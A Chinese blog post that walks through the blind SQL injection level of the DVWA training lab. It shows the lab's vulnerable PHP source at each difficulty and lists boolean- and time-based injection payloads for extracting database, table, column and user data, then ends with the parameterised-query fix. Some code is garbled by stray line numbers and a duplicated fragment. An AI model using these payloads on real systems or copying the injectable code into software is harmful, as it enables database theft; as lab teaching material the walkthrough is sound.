DVWA靶场-sql盲注_dvwa靶场的盲注

作者：Cpp五条 | 2024-03-19 09:56:50

踩

dvwa靶场的盲注

第八关：SQL Injection(Blind) 盲注

SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

Low

<?php
if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];
    $exists = false;
    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors
            try {
                $exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
            } catch(Exception $e) {
                $exists = false;
            }
            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }
            break;
    }
    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

分析代码可得，参数id没有做任何检查、过滤，存在明显的SQL注入漏洞，同时SQL语句查询返回的结果只有两种情况。

布尔盲注

1、判断注入的类型
输入1' and 1=1#, 1' and 1=2#进行判断

2、猜解当前数据库名
首先需要猜解数据库名的长度，然后挨个猜解字符

# 猜解数据库的长度
1' and length(database())=1 #
1' and length(database())=1 #
 ... 依次增大直到显示正确

# 使用二分法猜解数据库名的字符
1' and ascii(substr(database(),1,1))>97 #，显示存在，则表明字符的ASCII码大于97，在ASCII码 97 - 122 使用二分法继续进行判断
1' and ascii(substr(database(),1,1))>110 #
 ... 依次使用二分法直到查找到
1
2
3
4
5
6
7
8
9

3、猜解数据库中的表名

# 首先猜解数据库中表的数量
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 #，依次增加数字进行判断 '

# 猜解表名的长度
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1 #，依次增加数字进行判断 '

# 猜解表名的字符
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))>97 #，使用二分法进行判断

1
2
3
4
5
6
7
8
9

4、猜解表中的字段名

# 首先猜解表中字段的数量
1' and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 #，依次增加数字进行判断 '

# 猜解字段名的长度
1' and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),0,1))=1 ，依次增加数字进行判断 '

# 猜解表名的字符
1' and ascii(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),0,1))>97 #，使用二分法进行判断
1
2
3
4
5
6
7
8

5、猜解数据同样采用二分法进行判断，不够这种判断可以使用工具或者自己写代码进行猜解
在这里插入图片描述

时间盲注

1、判断是否存在注入点并确定类型

1' and sleep(5) #
1 and sleep(5) #
1
2

2、猜解数据库名

# 首先判断数据库名的长度
1' and if(length(database())=1,sleep(5),1) #
1' and if(length(database())=2,sleep(5),1) #
 ... 依次增加直到感觉有延迟

# if(a,b,c)  如果a满足条件，返回吧，否则返回c

# 猜解数据库名的字符
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1) #
1' and if(ascii(substr(database(),1,1))<100,sleep(5),1) #
 ... 依次增加直到感觉有延迟
1
2
3
4
5
6
7
8
9
10
11

3、猜解数据库的表名

# 猜解数据库中表的数量
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) # '
 ... 依次增加直到感觉有延迟

# 猜解表名的长度
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1,sleep(5),1) # '
 ...依次增加直到感觉有延迟

# 猜解表名的字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))>97,sleep(5),1) # '
 ...依次增加直到感觉有延迟
1
2
3
4
5
6
7
8
9
10
11

4、猜解表中的字段名

# 猜解字段的数量
1' and if((select count(column_name) from information_schema.columns where table_name= 'users')=1,sleep(5),1) # '

# 猜解字段的长度
1' and if(length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),0,1))=1,sleep(5),1) # '

# 猜解字段的字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),0,1))=97,sleep(5),1) # '
1
2
3
4
5
6
7
8

5、猜解数据，使用二分法增加效率

1' and if(ascii(substr((select username,password from users limit 0,1),0,1))=1,sleep(5),1) # '
1

Medium

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $exists = false;
    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors
            try {
                $exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
            } catch(Exception $e) {
                $exists = false;
            }     
            break;
        case SQLITE:
            global $sqlite_db_connection;
            
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }
            break;
    }
    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

代码中使用了mysql_real_escape_string函数对特殊符号进行转义，页面中也使用下拉框来避免用户的输入，且使用POST进行数据提交
虽然使用了POST进行数据提交，但是可以使用burp suite抓包获取参数信息，利用google插件hackbar进行POST数据提交，后面的步骤与low中类似。

High

<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];
    $exists = false;

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors

            // Get results
            try {
                $exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
            } catch(Exception $e) {
                $exists = false;
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

从源码中得到，sql查询语句做了limit限制，防止多条数据泄露，但可以使用#注释绕过；同时发现当sql查询为空或者出错时，代码将执行sleep函数，目的是为了扰乱基于时间的盲注，干扰我们的判断，因此不能使用基于时间的盲注，可以使用基于布尔的盲注。注入方法类似上面的步骤
在这里插入图片描述

Impossible

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    $exists = false;

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        $id = intval ($id);
        switch ($_DVWA['SQLI_DB']) {
            case MYSQL:
                // Check the database
                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );
                $data->execute();

                $exists = $data->rowCount();
                break;
            case SQLITE:
                global $sqlite_db_connection;

                $stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );
                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
                $result = $stmt->execute();
                $result->finalize();
                if ($result !== false) {
                    // There is no way to get the number of rows returned
                    // This checks the number of columns (not rows) just
                    // as a precaution, but it won't stop someone dumping
                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();
                    if ($num_columns == 1) {
                        $row = $result->fetchArray();

                        $numrows = $row[ 'numrows' ];
                        $exists = ($numrows == 1);
                    }
                }
                break;
        }

    }

    // Get results
    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

ID exists in the database.’;
} else {
// User wasn’t found, so the page wasn’t!
header( $_SERVER[ ‘SERVER_PROTOCOL’ ] . ’ 404 Not Found’ );

    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
}
1
2
3

}
// Generate Anti-CSRF token
generateSessionToken();
?>

Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入
1

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/Cpp五条/article/detail/267481